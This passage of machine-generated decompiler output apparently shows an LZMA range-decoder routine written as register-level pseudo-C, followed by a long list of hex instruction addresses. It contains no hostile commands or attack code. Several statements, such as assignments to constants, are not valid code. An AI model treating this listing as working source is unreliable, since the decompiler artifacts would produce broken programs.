											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                                                                                        0x00000000
                                                                                                                        0x00407068
                                                                                                                        0x00407068
                                                                                                                        0x0040706c
                                                                                                                        0x00407095
                                                                                                                        0x0040709f
                                                                                                                        0x0040706e
                                                                                                                        0x00407077
                                                                                                                        0x00407084
                                                                                                                        0x00407087
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x004073ce
                                                                                                                        0x004073ce
                                                                                                                        0x004073ce
                                                                                                                        0x004073d4
                                                                                                                        0x004073da
                                                                                                                        0x004073e0
                                                                                                                        0x004073fa
                                                                                                                        0x004073fd
                                                                                                                        0x00407403
                                                                                                                        0x0040740e
                                                                                                                        0x00407410
                                                                                                                        0x004073e2
                                                                                                                        0x004073e2
                                                                                                                        0x004073f1
                                                                                                                        0x004073f5
                                                                                                                        0x004073f5
                                                                                                                        0x0040741a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040741c
                                                                                                                        0x00407420
                                                                                                                        0x004075cf
                                                                                                                        0x004075e5
                                                                                                                        0x004075ed
                                                                                                                        0x004075f4
                                                                                                                        0x004075f6
                                                                                                                        0x004075fd
                                                                                                                        0x00407601
                                                                                                                        0x00407601
                                                                                                                        0x0040742c
                                                                                                                        0x00407433
                                                                                                                        0x0040743b
                                                                                                                        0x0040743e
                                                                                                                        0x00407441
                                                                                                                        0x00407441
                                                                                                                        0x00407447
                                                                                                                        0x00407447
                                                                                                                        0x00406be3
                                                                                                                        0x00406be3
                                                                                                                        0x00406be3
                                                                                                                        0x00406bec
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406bf2
                                                                                                                        0x00000000
                                                                                                                        0x00406bfd
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c06
                                                                                                                        0x00406c09
                                                                                                                        0x00406c0c
                                                                                                                        0x00406c10
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c16
                                                                                                                        0x00406c19
                                                                                                                        0x00406c1b
                                                                                                                        0x00406c1c
                                                                                                                        0x00406c1f
                                                                                                                        0x00406c21
                                                                                                                        0x00406c22
                                                                                                                        0x00406c24
                                                                                                                        0x00406c27
                                                                                                                        0x00406c2c
                                                                                                                        0x00406c31
                                                                                                                        0x00406c3a
                                                                                                                        0x00406c4d
                                                                                                                        0x00406c50
                                                                                                                        0x00406c5c
                                                                                                                        0x00406c84
                                                                                                                        0x00406c86
                                                                                                                        0x00406c94
                                                                                                                        0x00406c94
                                                                                                                        0x00406c98
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c88
                                                                                                                        0x00406c88
                                                                                                                        0x00406c8b
                                                                                                                        0x00406c8c
                                                                                                                        0x00406c8c
                                                                                                                        0x00000000
                                                                                                                        0x00406c88
                                                                                                                        0x00406c62
                                                                                                                        0x00406c67
                                                                                                                        0x00406c67
                                                                                                                        0x00406c70
                                                                                                                        0x00406c78
                                                                                                                        0x00406c7b
                                                                                                                        0x00000000
                                                                                                                        0x00406c81
                                                                                                                        0x00406c81
                                                                                                                        0x00000000
                                                                                                                        0x00406c81
                                                                                                                        0x00000000
                                                                                                                        0x00406c9e
                                                                                                                        0x00406c9e
                                                                                                                        0x00406ca2
                                                                                                                        0x0040754e
                                                                                                                        0x00000000
                                                                                                                        0x0040754e
                                                                                                                        0x00406cab
                                                                                                                        0x00406cbb
                                                                                                                        0x00406cbe
                                                                                                                        0x00406cc1
                                                                                                                        0x00406cc1
                                                                                                                        0x00406cc1
                                                                                                                        0x00406cc4
                                                                                                                        0x00406cc8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406cca
                                                                                                                        0x00406cd0
                                                                                                                        0x00406cfa
                                                                                                                        0x00406d00
                                                                                                                        0x00406d07
                                                                                                                        0x00000000
                                                                                                                        0x00406d07
                                                                                                                        0x00406cd6
                                                                                                                        0x00406cd9
                                                                                                                        0x00406cde
                                                                                                                        0x00406cde
                                                                                                                        0x00406ce9
                                                                                                                        0x00406cf1
                                                                                                                        0x00406cf4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406d39
                                                                                                                        0x00406d3f
                                                                                                                        0x00406d42
                                                                                                                        0x00406d4f
                                                                                                                        0x00406d57
                                                                                                                        0x004073cb
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406d0e
                                                                                                                        0x00406d0e
                                                                                                                        0x00406d12
                                                                                                                        0x0040755d
                                                                                                                        0x00000000
                                                                                                                        0x0040755d
                                                                                                                        0x00406d1e
                                                                                                                        0x00406d29
                                                                                                                        0x00406d29
                                                                                                                        0x00406d29
                                                                                                                        0x00406d2c
                                                                                                                        0x00406d2f
                                                                                                                        0x00406d32
                                                                                                                        0x00406d37
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004073ce
                                                                                                                        0x004073ce
                                                                                                                        0x004073d4
                                                                                                                        0x004073da
                                                                                                                        0x004073e0
                                                                                                                        0x004073fa
                                                                                                                        0x004073fd
                                                                                                                        0x00407403
                                                                                                                        0x0040740e
                                                                                                                        0x00407410
                                                                                                                        0x004073e2
                                                                                                                        0x004073e2
                                                                                                                        0x004073f1
                                                                                                                        0x004073f5
                                                                                                                        0x004073f5
                                                                                                                        0x0040741a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406d5f
                                                                                                                        0x00406d61
                                                                                                                        0x00406d64
                                                                                                                        0x00406dd5
                                                                                                                        0x00406dd8
                                                                                                                        0x00406ddb
                                                                                                                        0x00406de2
                                                                                                                        0x00406dec
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x00000000
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x00406d66
                                                                                                                        0x00406d6a
                                                                                                                        0x00406d6d
                                                                                                                        0x00406d6f
                                                                                                                        0x00406d72
                                                                                                                        0x00406d75
                                                                                                                        0x00406d77
                                                                                                                        0x00406d7a
                                                                                                                        0x00406d7c
                                                                                                                        0x00406d81
                                                                                                                        0x00406d84
                                                                                                                        0x00406d87
                                                                                                                        0x00406d8b
                                                                                                                        0x00406d92
                                                                                                                        0x00406d95
                                                                                                                        0x00406d9c
                                                                                                                        0x00406da0
                                                                                                                        0x00406da8
                                                                                                                        0x00406da8
                                                                                                                        0x00406da8
                                                                                                                        0x00406da2
                                                                                                                        0x00406da2
                                                                                                                        0x00406da2
                                                                                                                        0x00406d97
                                                                                                                        0x00406d97
                                                                                                                        0x00406d97
                                                                                                                        0x00406dac
                                                                                                                        0x00406daf
                                                                                                                        0x00406dcd
                                                                                                                        0x00406dcf
                                                                                                                        0x00000000
                                                                                                                        0x00406db1
                                                                                                                        0x00406db1
                                                                                                                        0x00406db4
                                                                                                                        0x00406db7
                                                                                                                        0x00406dba
                                                                                                                        0x00406dbc
                                                                                                                        0x00406dbc
                                                                                                                        0x00406dbc
                                                                                                                        0x00406dbf
                                                                                                                        0x00406dc2
                                                                                                                        0x00406dc4
                                                                                                                        0x00406dc5
                                                                                                                        0x00406dc8
                                                                                                                        0x00000000
                                                                                                                        0x00406dc8
                                                                                                                        0x00000000
                                                                                                                        0x00406ffe
                                                                                                                        0x00407002
                                                                                                                        0x00407020
                                                                                                                        0x00407023
                                                                                                                        0x0040702a
                                                                                                                        0x0040702d
                                                                                                                        0x00407030
                                                                                                                        0x00407033
                                                                                                                        0x00407036
                                                                                                                        0x00407039
                                                                                                                        0x0040703b
                                                                                                                        0x00407042
                                                                                                                        0x00407043
                                                                                                                        0x00407045
                                                                                                                        0x00407048
                                                                                                                        0x0040704b
                                                                                                                        0x0040704e
                                                                                                                        0x0040704e
                                                                                                                        0x00407053
                                                                                                                        0x00000000
                                                                                                                        0x00407053
                                                                                                                        0x00407004
                                                                                                                        0x00407007
                                                                                                                        0x0040700a
                                                                                                                        0x00407014
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x00000000
                                                                                                                        0x004073cb
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070ab
                                                                                                                        0x004070af
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070b5
                                                                                                                        0x004070b9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070bf
                                                                                                                        0x004070c1
                                                                                                                        0x004070c5
                                                                                                                        0x004070c5
                                                                                                                        0x004070c8
                                                                                                                        0x004070cc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040711c
                                                                                                                        0x00407120
                                                                                                                        0x00407127
                                                                                                                        0x0040712a
                                                                                                                        0x0040712d
                                                                                                                        0x00407137
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x00000000
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x00407122
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407143
                                                                                                                        0x00407147
                                                                                                                        0x0040714e
                                                                                                                        0x00407151
                                                                                                                        0x00407154
                                                                                                                        0x00407149
                                                                                                                        0x00407149
                                                                                                                        0x00407149
                                                                                                                        0x00407157
                                                                                                                        0x0040715a
                                                                                                                        0x0040715d
                                                                                                                        0x0040715d
                                                                                                                        0x00407160
                                                                                                                        0x00407163
                                                                                                                        0x00407166
                                                                                                                        0x00407166
                                                                                                                        0x00407169
                                                                                                                        0x00407170
                                                                                                                        0x00407175
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407203
                                                                                                                        0x00407203
                                                                                                                        0x00407207
                                                                                                                        0x004075a5
                                                                                                                        0x00000000
                                                                                                                        0x004075a5
                                                                                                                        0x0040720d
                                                                                                                        0x00407210
                                                                                                                        0x00407213
                                                                                                                        0x00407217
                                                                                                                        0x0040721a
                                                                                                                        0x00407220
                                                                                                                        0x00407222
                                                                                                                        0x00407222
                                                                                                                        0x00407222
                                                                                                                        0x00407225
                                                                                                                        0x00407228
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406df8
                                                                                                                        0x00406df8
                                                                                                                        0x00406dfc
                                                                                                                        0x00407569
                                                                                                                        0x00000000
                                                                                                                        0x00407569
                                                                                                                        0x00406e02
                                                                                                                        0x00406e05
                                                                                                                        0x00406e08
                                                                                                                        0x00406e0c
                                                                                                                        0x00406e0f
                                                                                                                        0x00406e15
                                                                                                                        0x00406e17
                                                                                                                        0x00406e17
                                                                                                                        0x00406e17
                                                                                                                        0x00406e1a
                                                                                                                        0x00406e1d
                                                                                                                        0x00406e1d
                                                                                                                        0x00406e20
                                                                                                                        0x00406e23
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406e29
                                                                                                                        0x00406e2f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406e35
                                                                                                                        0x00406e35
                                                                                                                        0x00406e39
                                                                                                                        0x00406e3c
                                                                                                                        0x00406e3f
                                                                                                                        0x00406e42
                                                                                                                        0x00406e45
                                                                                                                        0x00406e46
                                                                                                                        0x00406e49
                                                                                                                        0x00406e4b
                                                                                                                        0x00406e51
                                                                                                                        0x00406e54
                                                                                                                        0x00406e57
                                                                                                                        0x00406e5a
                                                                                                                        0x00406e5d
                                                                                                                        0x00406e60
                                                                                                                        0x00406e63
                                                                                                                        0x00406e7f
                                                                                                                        0x00406e82
                                                                                                                        0x00406e85
                                                                                                                        0x00406e88
                                                                                                                        0x00406e8f
                                                                                                                        0x00406e93
                                                                                                                        0x00406e95
                                                                                                                        0x00406e99
                                                                                                                        0x00406e65
                                                                                                                        0x00406e65
                                                                                                                        0x00406e69
                                                                                                                        0x00406e71
                                                                                                                        0x00406e76
                                                                                                                        0x00406e78
                                                                                                                        0x00406e7a
                                                                                                                        0x00406e7a
                                                                                                                        0x00406e9c
                                                                                                                        0x00406ea3
                                                                                                                        0x00406ea6
                                                                                                                        0x00000000
                                                                                                                        0x00406eac
                                                                                                                        0x00000000
                                                                                                                        0x00406eac
                                                                                                                        0x00000000
                                                                                                                        0x00406eb1
                                                                                                                        0x00406eb1
                                                                                                                        0x00406eb5
                                                                                                                        0x00407575
                                                                                                                        0x00000000
                                                                                                                        0x00407575
                                                                                                                        0x00406ebb
                                                                                                                        0x00406ebe
                                                                                                                        0x00406ec1
                                                                                                                        0x00406ec5
                                                                                                                        0x00406ec8
                                                                                                                        0x00406ece
                                                                                                                        0x00406ed0
                                                                                                                        0x00406ed0
                                                                                                                        0x00406ed0
                                                                                                                        0x00406ed3
                                                                                                                        0x00406ed6
                                                                                                                        0x00406ed6
                                                                                                                        0x00406ed6
                                                                                                                        0x00406edc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406ede
                                                                                                                        0x00406ee1
                                                                                                                        0x00406ee4
                                                                                                                        0x00406ee7
                                                                                                                        0x00406eea
                                                                                                                        0x00406eed
                                                                                                                        0x00406ef0
                                                                                                                        0x00406ef3
                                                                                                                        0x00406ef6
                                                                                                                        0x00406ef9
                                                                                                                        0x00406efc
                                                                                                                        0x00406f14
                                                                                                                        0x00406f17
                                                                                                                        0x00406f1a
                                                                                                                        0x00406f1d
                                                                                                                        0x00406f1d
                                                                                                                        0x00406f20
                                                                                                                        0x00406f24
                                                                                                                        0x00406f26
                                                                                                                        0x00406efe
                                                                                                                        0x00406efe
                                                                                                                        0x00406f06
                                                                                                                        0x00406f0b
                                                                                                                        0x00406f0d
                                                                                                                        0x00406f0f
                                                                                                                        0x00406f0f
                                                                                                                        0x00406f29
                                                                                                                        0x00406f30
                                                                                                                        0x00406f33
                                                                                                                        0x00000000
                                                                                                                        0x00406f35
                                                                                                                        0x00000000
                                                                                                                        0x00406f35
                                                                                                                        0x00406f33
                                                                                                                        0x00406f3a
                                                                                                                        0x00406f3a
                                                                                                                        0x00406f3a
                                                                                                                        0x00406f3a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406f75
                                                                                                                        0x00406f75
                                                                                                                        0x00406f79
                                                                                                                        0x00407581
                                                                                                                        0x00000000
                                                                                                                        0x00407581
                                                                                                                        0x00406f7f
                                                                                                                        0x00406f82
                                                                                                                        0x00406f85
                                                                                                                        0x00406f89
                                                                                                                        0x00406f8c
                                                                                                                        0x00406f92
                                                                                                                        0x00406f94
                                                                                                                        0x00406f94
                                                                                                                        0x00406f94
                                                                                                                        0x00406f97
                                                                                                                        0x00406f9a
                                                                                                                        0x00406f9a
                                                                                                                        0x00406fa0
                                                                                                                        0x00406f3e
                                                                                                                        0x00406f3e
                                                                                                                        0x00406f41
                                                                                                                        0x00000000
                                                                                                                        0x00406f41
                                                                                                                        0x00406fa2
                                                                                                                        0x00406fa2
                                                                                                                        0x00406fa5
                                                                                                                        0x00406fa8
                                                                                                                        0x00406fab
                                                                                                                        0x00406fae
                                                                                                                        0x00406fb1
                                                                                                                        0x00406fb4
                                                                                                                        0x00406fb7
                                                                                                                        0x00406fba
                                                                                                                        0x00406fbd
                                                                                                                        0x00406fc0
                                                                                                                        0x00406fd8
                                                                                                                        0x00406fdb
                                                                                                                        0x00406fde
                                                                                                                        0x00406fe1
                                                                                                                        0x00406fe1
                                                                                                                        0x00406fe4
                                                                                                                        0x00406fe8
                                                                                                                        0x00406fea
                                                                                                                        0x00406fc2
                                                                                                                        0x00406fc2
                                                                                                                        0x00406fca
                                                                                                                        0x00406fcf
                                                                                                                        0x00406fd1
                                                                                                                        0x00406fd3
                                                                                                                        0x00406fd3
                                                                                                                        0x00406fed
                                                                                                                        0x00406ff4
                                                                                                                        0x00406ff7
                                                                                                                        0x00000000
                                                                                                                        0x00406ff9
                                                                                                                        0x00000000
                                                                                                                        0x00406ff9
                                                                                                                        0x00000000
                                                                                                                        0x00407286
                                                                                                                        0x00407286
                                                                                                                        0x0040728a
                                                                                                                        0x004075b1
                                                                                                                        0x00000000
                                                                                                                        0x004075b1
                                                                                                                        0x00407290
                                                                                                                        0x00407293
                                                                                                                        0x00407296
                                                                                                                        0x0040729a
                                                                                                                        0x0040729d
                                                                                                                        0x004072a3
                                                                                                                        0x004072a5
                                                                                                                        0x004072a5
                                                                                                                        0x004072a5
                                                                                                                        0x004072a8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407056
                                                                                                                        0x00407056
                                                                                                                        0x00407059
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x00000000
                                                                                                                        0x004073cb
                                                                                                                        0x00000000
                                                                                                                        0x00407395
                                                                                                                        0x00407399
                                                                                                                        0x004073bb
                                                                                                                        0x004073be
                                                                                                                        0x004073c8
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x00000000
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x0040739b
                                                                                                                        0x0040739e
                                                                                                                        0x004073a2
                                                                                                                        0x004073a5
                                                                                                                        0x004073a5
                                                                                                                        0x004073a8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407452
                                                                                                                        0x00407456
                                                                                                                        0x00407474
                                                                                                                        0x00407474
                                                                                                                        0x00407474
                                                                                                                        0x0040747b
                                                                                                                        0x00407482
                                                                                                                        0x00407489
                                                                                                                        0x00407489
                                                                                                                        0x00000000
                                                                                                                        0x00407489
                                                                                                                        0x00407458
                                                                                                                        0x0040745b
                                                                                                                        0x0040745e
                                                                                                                        0x00407461
                                                                                                                        0x00407468
                                                                                                                        0x004073ac
                                                                                                                        0x004073ac
                                                                                                                        0x004073af
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407543
                                                                                                                        0x00407546
                                                                                                                        0x00407447
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040717d
                                                                                                                        0x0040717f
                                                                                                                        0x00407186
                                                                                                                        0x00407187
                                                                                                                        0x00407189
                                                                                                                        0x0040718c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407194
                                                                                                                        0x00407197
                                                                                                                        0x0040719a
                                                                                                                        0x0040719c
                                                                                                                        0x0040719e
                                                                                                                        0x0040719e
                                                                                                                        0x0040719f
                                                                                                                        0x004071a2
                                                                                                                        0x004071a9
                                                                                                                        0x004071ac
                                                                                                                        0x004071ba
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407490
                                                                                                                        0x00407490
                                                                                                                        0x00407493
                                                                                                                        0x0040749a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040749f
                                                                                                                        0x0040749f
                                                                                                                        0x004074a3
                                                                                                                        0x004075db
                                                                                                                        0x00000000
                                                                                                                        0x004075db
                                                                                                                        0x004074a9
                                                                                                                        0x004074ac
                                                                                                                        0x004074af
                                                                                                                        0x004074b3
                                                                                                                        0x004074b6
                                                                                                                        0x004074bc
                                                                                                                        0x004074be
                                                                                                                        0x004074be
                                                                                                                        0x004074be
                                                                                                                        0x004074c1
                                                                                                                        0x004074c4
                                                                                                                        0x004074c4
                                                                                                                        0x004074c4
                                                                                                                        0x004074c4
                                                                                                                        0x004074c7
                                                                                                                        0x004074c7
                                                                                                                        0x004074cb
                                                                                                                        0x0040752b
                                                                                                                        0x0040752e
                                                                                                                        0x00407533
                                                                                                                        0x00407534
                                                                                                                        0x00407536
                                                                                                                        0x00407538
                                                                                                                        0x0040753b
                                                                                                                        0x00407447
                                                                                                                        0x00407447
                                                                                                                        0x00000000
                                                                                                                        0x0040744d
                                                                                                                        0x00407447
                                                                                                                        0x004074cd
                                                                                                                        0x004074d3
                                                                                                                        0x004074d6
                                                                                                                        0x004074d9
                                                                                                                        0x004074dc
                                                                                                                        0x004074df
                                                                                                                        0x004074e2
                                                                                                                        0x004074e5
                                                                                                                        0x004074e8
                                                                                                                        0x004074eb
                                                                                                                        0x004074ee
                                                                                                                        0x00407507
                                                                                                                        0x0040750a
                                                                                                                        0x0040750d
                                                                                                                        0x00407510
                                                                                                                        0x00407514
                                                                                                                        0x00407516
                                                                                                                        0x00407516
                                                                                                                        0x00407517
                                                                                                                        0x0040751a
                                                                                                                        0x004074f0
                                                                                                                        0x004074f0
                                                                                                                        0x004074f8
                                                                                                                        0x004074fd
                                                                                                                        0x004074ff
                                                                                                                        0x00407502
                                                                                                                        0x00407502
                                                                                                                        0x0040751d
                                                                                                                        0x00407524
                                                                                                                        0x00000000
                                                                                                                        0x00407526
                                                                                                                        0x00000000
                                                                                                                        0x00407526
                                                                                                                        0x00000000
                                                                                                                        0x004071c2
                                                                                                                        0x004071c5
                                                                                                                        0x004071fb
                                                                                                                        0x0040732b
                                                                                                                        0x0040732b
                                                                                                                        0x0040732b
                                                                                                                        0x0040732b
                                                                                                                        0x0040732e
                                                                                                                        0x0040732e
                                                                                                                        0x00407331
                                                                                                                        0x00407333
                                                                                                                        0x004075bd
                                                                                                                        0x00000000
                                                                                                                        0x004075bd
                                                                                                                        0x00407339
                                                                                                                        0x0040733c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407342
                                                                                                                        0x00407346
                                                                                                                        0x00407349
                                                                                                                        0x00407349
                                                                                                                        0x00407349
                                                                                                                        0x00000000
                                                                                                                        0x00407349
                                                                                                                        0x004071c7
                                                                                                                        0x004071c9
                                                                                                                        0x004071cb
                                                                                                                        0x004071cd
                                                                                                                        0x004071d0
                                                                                                                        0x004071d1
                                                                                                                        0x004071d3
                                                                                                                        0x004071d5
                                                                                                                        0x004071d8
                                                                                                                        0x004071db
                                                                                                                        0x004071f1
                                                                                                                        0x004071f6
                                                                                                                        0x0040722e
                                                                                                                        0x0040722e
                                                                                                                        0x00407232
                                                                                                                        0x0040725e
                                                                                                                        0x00407260
                                                                                                                        0x00407267
                                                                                                                        0x0040726a
                                                                                                                        0x0040726d
                                                                                                                        0x0040726d
                                                                                                                        0x00407272
                                                                                                                        0x00407272
                                                                                                                        0x00407274
                                                                                                                        0x00407277
                                                                                                                        0x0040727e
                                                                                                                        0x00407281
                                                                                                                        0x004072ae
                                                                                                                        0x004072ae
                                                                                                                        0x004072b1
                                                                                                                        0x004072b4
                                                                                                                        0x00407328
                                                                                                                        0x00407328
                                                                                                                        0x00407328
                                                                                                                        0x00000000
                                                                                                                        0x00407328
                                                                                                                        0x004072b6
                                                                                                                        0x004072bc
                                                                                                                        0x004072bf
                                                                                                                        0x004072c2
                                                                                                                        0x004072c5
                                                                                                                        0x004072c8
